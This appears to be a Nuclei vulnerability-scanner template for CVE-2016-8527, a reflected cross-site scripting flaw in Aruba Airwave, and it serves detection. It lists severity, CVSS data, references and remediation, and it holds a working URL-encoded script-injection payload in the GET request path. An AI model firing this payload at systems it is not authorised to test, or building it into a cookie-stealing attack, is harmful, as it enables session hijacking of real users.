id: CVE-2016-8527 info: name: Aruba Airwave <8.2.3.1 - Cross-Site Scripting author: pikpikcu severity: medium description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/41482 - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt - https://www.exploit-db.com/exploits/41482/ - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 epss-score: 0.00117 epss-percentile: 0.45479 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hp product: airwave tags: cve2016,cve,aruba,xss,edb,hp http: - method: GET path: - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100e9346e18bfb4c4d6a1081d41f4cd34352fa4d926162744dcc66b0333f6cb0b7f022100a130940d70233629a33858b36b594b16b3fac8249e1612e0dbee3f832cce06f5:922c64590222798bb761d5b6d8e72950